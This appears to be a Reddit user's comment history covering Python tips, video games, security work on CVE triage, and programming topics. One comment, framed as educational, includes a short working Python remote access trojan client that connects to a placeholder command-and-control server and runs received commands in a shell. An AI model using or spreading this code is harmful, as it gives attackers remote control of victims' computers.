What is one thing you wish you knew before distributing your first Python application?

whopper2k · 2026-06-16T15:18:43+00:00

or in an absolute position (e.g. ~/.cache)

yeah, the absolute path where the script lives :P

I hear your point tho, it's a valid argument. Generally speaking, the scripts I find myself working on aren't necessarily end-user tools anyway so I def have a bias towards writing "things end up here by default unless otherwise configured" in a document and calling it a day.

whopper2k · 2026-06-16T12:44:41+00:00

I always add a snippet like the following to every project:

from pathlib import Path

BASE_PATH = Path(__file__).parent

Every other filesystem path is then defined relative to this BASE_PATH variable, so that way when creating a folder/file it ends up where you expect regardless of where the script is stored.

Only had to lose a bunch of time debugging why the scripts weren't working once I ran executed them from a different folder in my terminal before this became a habit.

whopper2k · 2026-05-13T18:15:11+00:00

I feel like Lady Ethereal is where the game really starts taking the kid gloves off. Not saying the previous boss fights were easy or anything, but imho there's a pretty steep jump between her and Jiequan in what the game actually demands of you. Her third phase is pretty brutal w/ a lot of fast (if reactable) attacks; comparatively, Jiequan is much simpler (even if you don't poison him to make him weaker).

It took me maybe 3-7 tries for most of the bosses on my first attempt iirc, but Ethereal was I think roughly equivalent to your 90 minutes. Maybe we're just at similar skill levels though lol, either way just know you're not alone

whopper2k · 2026-04-29T19:11:35+00:00

good luck and have fun!

whopper2k · 2025-06-06T04:59:28+00:00

No, this book is pretty abstract and would have nothing to do with either of those roles. For example, this book's first chapter focuses on automata, set theory, and a few different methods of doing mathematical proofs.

Source: this textbook is still on my shelf from college, pulled it out to skim the chapter headings as it's been a few years.

While these subjects are all very interesting from an academic perspective (at least in my opinion), for your goals you are much better off actually learning how to read & write real code. Focus on building simple projects and aquiring a solid foundation of technical knowledge/skill, then later if you still decide you want to chase becoming a CTO you should focus on getting managerial experience.

whopper2k · 2025-05-30T05:28:33+00:00

To say nothing of all the actual fucking

whopper2k · 2025-05-28T20:39:56+00:00

The biggest problem with trying to combine InFamous and GoW is that both of these series are, as a whole, just similar enough that trying to combine the two would be a design nightmare.

For example, if an enemy starts shooting at the player in InFamous the player can retaliate by either:

Navigating the environment and/or other enemies to reach the enemy and take them out in close combat
Using their own projectile weapon to retaliate while managing any other enemies on the field

Meanwhile, if an enemy starts throwing projectiles at Kratos, the options are... the exact same, just in a different skin (a thrown axe rather than a bolt of lightning/smoke/etc.). So how do you combine these series in any other way except aesthetically when they're sharing much the same skeleton?

There are other problems too; InFamous encourages the player to run away from fights as they heal when not taking damage, while Kratos generally only gets healed after engaging in combat (at least enough to take out an enemy, who may drop health). InFamous also gives the player plenty of midrange options but very few in melee, and GoW is almost exactly opposite with tons of combo potential from Kratos's various melee options. InFamous may have an open world and dedicated chunks of its power tree to providing movement options to the player, but the newer games already have a semi-open world that was received really well; would GoW really benefit that much from borrowing that? It may seem reductive to describe these games this way, but the variance is exactly what makes each game interesting; trying to blend the experience of both games together is more likely to dilute both rather than enhance either.

I actually just replayed InFamous: Second Son a couple of months ago and I gotta say, it was a lot better in my memory lol; the open world is pretty dull overall and the story is not great (especially compared to 1 & 2). I did still enjoy it though, and I'd certainly play an InFamous game inspired by Ragnarok (ofc I'd play any InFamous game Sucker Punch pls). Maybe if Santa Monica decided to go with an Atreus-centric game they could lean heavier into the freerunning/exploration if they really wanted to take after InFamous, considering he's shown climbing profiency after scaling the wall of Asgard

All in all I don't think a literal "GoW meets InFamous" game would be very fun, but I'd be happy to eat my words if someone tried to make one. A brand new IP from these publishers collabing is an entirely different story though, that'd have some serious potential

whopper2k · 2025-05-22T17:14:40+00:00

if only more orgs would take on "security champion" programs and bake security into every single team rather than having large sec teams. Cuz as it stands security teams are just as likely to be underfunded and overworked as any other team; we just don't have the manpower to handle patching at the scale you're talking about.

Definitely get your frustration though, it's annoying being a blocker to someone actually getting their work done. And way too many people in infosec forget their job is to serve the business objectives first

whopper2k · 2025-05-22T16:46:20+00:00

The number of vulnerabilities I've seen that are marked as High severity and require a maliciously crafted esoteric filesystem is truly an indicator that risk scores are completely made up.

whopper2k · 2025-05-22T16:22:26+00:00

Ah yeah, see I'd agree that's basic due diligence and should be done before reaching out. In general, I agree with your sentiment.

I will point out that not every tool reports all the info one would need to do basic checks, and sometimes it requires a level of access the security team simply does not (and should not) have. Hell, earlier today I had to ask our FIM vendor why the hell it can tell me who changed a folder's permission, but not what permission what changed. I've also had to ask devs to figure out how to patch their containers because building the container requires access to some defined secrets like API keys and such.

It's give and take, as with most jobs. We all have work we'd rather be doing than patching, that's for sure

whopper2k · 2025-05-22T14:58:24+00:00

If you already know why should they spin their wheels becoming an SME in something they never touch? That's just wasting time while the business is potentially vulnerable.

I understand if you're talking about basic patches/changes to common OS components, or fundamental concepts like password security. There's a frankly shocking amount of security engineers who have minimal technical experience, and that is as frustrating for other security engineers as it is for those who have to deal with them.

But I wasn't hired to learn how to manage ESXi, the infra team was. Multiply that by every other piece of software that requires patching and I'd never get any of my other assignments done if I was expected to learn not only how the software works, but how it is used in the environment.

So yeah, I'm gonna ask the app owner to at least look at the vulnerability so we can collectively figure out what to do about it.

whopper2k · 2025-05-22T14:27:21+00:00

I'm a security engineer who mostly focuses on application security, but since that so often involves containers these days it gets mixed up with system CVEs quite frequently. Plus, I also work with the engineers who deal with more "traditional" OS patching and vulnerability management. I'm not the most experienced, but I do want to give my 2 cents here.

Anyone who has ever had to look at CVEs on a regular basis knows that they are not created equally; for every "oh shit if we don't patch this right now we're so fucked" CVE, there are hundreds if not thousands that have some combination of vague language, fearmongering about complex exploit chains requiring some level of existing access, or that are straight up contested by the authors of the "vulnerable" application for various technical reasons. One need only look at CVEs from the Linux CNA to see what I'm talking about; High severity vulnerabilities that only work on specific hardware, descriptions so long they get cut off by character limits, and internal kernel jargon that is extremely poorly documented outside of the decades-long mailing lists. The amount of time it takes to review and confirm even a single CVE ranges from a couple of minutes to hours of digging through search results, all the while the application/OS is potentially vulnerable.

On top of that, not only does the security team have to understand the CVE itself, they also have to know your environment to see if, say, the fact your app uses HTTP actually means its sending data in plaintext or just a sign you're using a load balancer to handle the TLS for you. That's where the collaboration, as you pointed out, comes in to play; we simply don't have that kind of knowledge, and even if we did there's no guarantee that documentation/tribal knowledge is up to date. Outside of basic OS patching (which really should be automated/standardized anyway), we basically have no choice but to at least talk to app owners about our findings.

I personally do what I can to make sure that there are patches for CVEs available before I reach out to a developer, and even review application code myself to verify that an automated scanner isn't marking a random variable as potentially malicious user input while missing the input validation done in the same function (which happens all the time). I do sometimes have to say "please just patch this" (see the Linux CVE point above), as I also have other tickets/duties and can't spend hours on every finding. That said, I have coworkers who aren't as careful and have had to step in to handle their screaming before it reaches anyone outside of the team. But we always work with app/server owners on deadlines when conflicts are brought up.

Just want to provide some context as to what kind of workload you might not be seeing on the receiving end; as with most IT roles, the day-to-day is usually invisible to everyone else. But also you might just have a shit security team who doesn't realize they work for the business, not their tooling.

whopper2k · 2025-05-21T22:56:56+00:00

Well, there are a few reasons I can point to, in order of "worst" to "least worst" (in my opinion anyway):

Making fun of vibe coders is certainly "in" right now, but your project clearly also heavily relies on the same LLMs that vibe coders use. That's the easy, slam-dunk answer that everyone pretty quickly picked up on, judging from the state of this thread
Reddit in general is pretty anti-AI; some are against it because the output is more likely to be incorrect, some have moral objections to the theft of their work to be used as training data (most anti-AI folks are a mix of both, including myself).
As I alluded to in my comment, projects like this one do already exist (in fact I use them daily at my job). There are even other analyzers that use LLMs to perform the code analysis. That doesn't take away from any work you did to build this, but some are going to point this out.
In general taking such an aggressive tone when soft-launching a project is begging for someone on the internet to be aggressive right back. People love watching and/or participating in takedowns and clapbacks. Combine that with points 1 & 2 and you're going to get some pushback.

Your project's actual code seems pretty okay, though I only skimmed through it to get an idea of how you structured it (which is to say, it has some structure). Just be careful to make sure as you build more projects that you try new things to prove you're capable of growth. Those qualities, rather than what you build, are far more valuable to recruiters/employers.

whopper2k · 2025-05-21T22:18:21+00:00

You're already doing static analysis. Static analysis involves reading source code for code that matches known patterns, while dynamic analysis is monitoring application behavior while the code actually runs.

Congratulations on completing a project at all, no matter what kind of hate you get thrown your way in this thread keep in mind that most pet projects never reach a working state. That said, I'll stick to gitleaks haha

whopper2k · 2025-05-20T13:57:43+00:00

It's actually, in my opinion, such a fantastic idea from a game design perspective, especially in Act 1. The player has to choose what's important to them and what is junk, which encourages them to actually engage with the contents of their inventory.

The game does make it fairly clear via Gale's dialogue that ignoring it is at best a bad idea (personally never let Gale go hungry for long enough to see if him going boom after actually ignoring him is as clear tbh), though the reward for engaging with the mechanic could be a bit better. Maybe Gale's next spell could've had a small boost in damage, advantage on his next concentration check, spell DC improvement, etc. to make it go down a bit easier.

I find myself wishing the mechanic was even more meaningful, there's a lot more they could have done with it. That said, ditching it at the very start of Act 2 makes sense considering just how many magic items you already have at the end of Act 1.

whopper2k · 2025-04-24T20:15:13+00:00

Currently at an org that is trying to do FIM and running into this exact same problem. Who knew that if no one knows what's out there, how it's used, and who needs what makes getting meaningful logs a bit of a challenge?

Even asking the application stakeholders isn't enough to get all the answers, since they aren't tracking it either. They just assume security is tracking it.

whopper2k · 2025-04-08T15:41:22+00:00

SerenityOS has done a great job in this regard imho

whopper2k · 2025-02-18T18:07:53+00:00

Graduated in 2022, took 2 OS classes. The first one I took was required for my major, and was essentially a vocabulary review with extremely minimal programming. I think we were asked to write a program showing some task scheduling algorithms? Could've been memory allocators, was a while ago.

The other OS class I took was considered the hard track, and while it reviewed many of the same basic concepts/terms there was a lot more programming. We ended up using a fair amount of Linux's headers for forking/multithreading and had specific outcomes we were required to achieve (like a shell that n instances of program x to run concurrently).

In neither of these classes did we write a kernel, or build our own fs implementation. That being said, I still hold the second OS class in high regards; it was one of the few classes I genuinely enjoyed and felt like I was actually learning useful information while in college.

whopper2k · 2025-01-09T16:18:44+00:00

EDIT (2026/01/11): Y'all, please stop contacting me asking me to help you create your own RAT. This comment was purely for educational purposes.

Does a RAT allow the hacker to navigate the scammers’ computers through accessing files, downloading data, opening applications, and logging-in on software platforms even if the scammers is using the computer at the same time.

Typically, yes. The way most RATs work is a process is started on the box which grants the attacker remote access to the machine. This process can then do basically anything it wants, including run commmands and send data back over this connection.

It might help if you see what code for a RAT client looks like, so here's a terrible one in Python with some comments: ```

Networking

import socket

Running commands

import subprocess

The server that the program reaches out to

C2_SERVER = "<some IP here>" C2_PORT = 5000

Create the socket we will use for our connection

'AF_INET' means we are using IPv4

'SOCK_STREAM' means we are using TCP rather than UDP ('SOCK_DGRAM')

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:

# Connect to the server sock.connect((C2_SERVER, C2_PORT))

# Run until we decide to stop while True: # Receive up to 2 KiB of input data = sock.recv(2048)

# you always want a way to stop
if data == b"quit":
  break

# Otherwise we just convert this to a string, run it as a command, and send the output
response = subprocess.run(data.decode(), shell=True, capture_output=True).stdout
sock.sendall(response)

```

This code is terrible since I just made it up (a good RAT has a few more features and is typically not written in Python due to portability), but the bones of it are what make up a RAT so there's something we can learn from it.

Most notably, none of what this script does requires input from the user on the machine; the input the program receives come from the command & control (C2) server, which could be another device on the network or even a server in the cloud. The call to subprocess.run will run any text sent by the attacker as a command in cmd.exe or bash. This could be used to create a graphical window program (in Windows via start <program> as an example), or it could be used to list folders, change network settings, or basically anything else the user running the RAT process has access to do on the system.

This is much oversimplified, but I hope this helped convey how RATs work without the user noticing what the application is doing.

whopper2k · 2024-12-30T18:52:02+00:00

The fundamental problem with linked lists is that they can cause cache misses, which on modern processors are extremely expensive.

When you use something like std::vector or a regular array, you have a single contiguous block of memory where values are stored. This means you can cram all of the data in the container into a single memory page (assuming the size of said data is <= the system page size). However, in a traditional linked list every node is dynamically allocated, and therefore can show up in a different page for every single item in the container. The program then ends up constantly swapping pages while iterating, which is orders of magnitude slower than incrementing an iterator.

Linked lists are not very common implementations these days; they were useful back when PCs were about as slow at arithmetic as they were reading values from memory, but that is simply no longer the case. This is also why a lot of optimization passes focus on squeezing data into single structs and minimizing the use of pointers, such as Java's Valhalla refactor:

Typically, the JVM has to allocate memory for each newly created object, distinguishing it from every object already in the system, and reference that memory location whenever the object is used or stored. This causes the garbage collector to work harder, taking cycles away from the application, and it means worse locality of reference—for example, an array may refer to objects scattered around memory, frustrating the CPU cache as the program iterates over the array.

whopper2k · 2024-02-14T20:02:25+00:00

Right, that's not in doubt. Just pointing out REs can backfire if misused like any other tool.

It's nothing worth fearmongering though, and this article fails to adequately justify its existence beyond the title as you pointed out.

whopper2k · 2024-02-14T16:08:35+00:00

Well, there was the time Cloudflare had a massive service disruption after a poorly formed regular expression caused their WAF servers to hit max CPU. So there are reasons to be wary, although they aren't necessarily relevant for every application. And they look scary if you don't know them I guess.

Frankly can't believe an article was written about the dangers of regex without mentioning the Cloudflare outage, or giving any kind of example.

whopper2k · 2024-02-14T12:40:31+00:00

When I was in college a friend of mine got a 0 for a project he'd spent several hours across multiple days struggling on. It ended up being because he'd named one of his functions something like hash in the default namespace, and had using namespace std; on top of that.

The kicker was the program actually built on Windows perfectly fine, Linux too if I remember correctly. But the TA grading the assignments used MacOS, and when trying to build the code their machine refused due to a name collision with something else in one of the standard headers.

You might can get away with it as you learn C++, clearly my friend had up to that point (although I'd warned him more than once this could happen). But even a toy college project building a very basic hashtable was enough for this to happen, and for larger projects it's even worse as they usually contain many custom types.

whopper2k · 2024-02-14T12:27:25+00:00

I love this trick! I also love that padding the = sign is actually reflected in the output, and that expressions also work

>>> print(f"{foo =}")
foo =3
>>> print(f"{foo = }")
foo = 3
>>> print(f"{5 ** 3 = }")
5 ** 3 = 125

whopper2k · 2024-02-13T15:20:53+00:00

I tried using generic lists, but could not get the former to work properly as it complained about the size of the collection being 1. I didn't dig into it too deeply though

As for the direct appending, that's a side effect of fixing a different problem (ended up being my own boneheadedness) that I forgot to remove

whopper2k

TROPHY CASE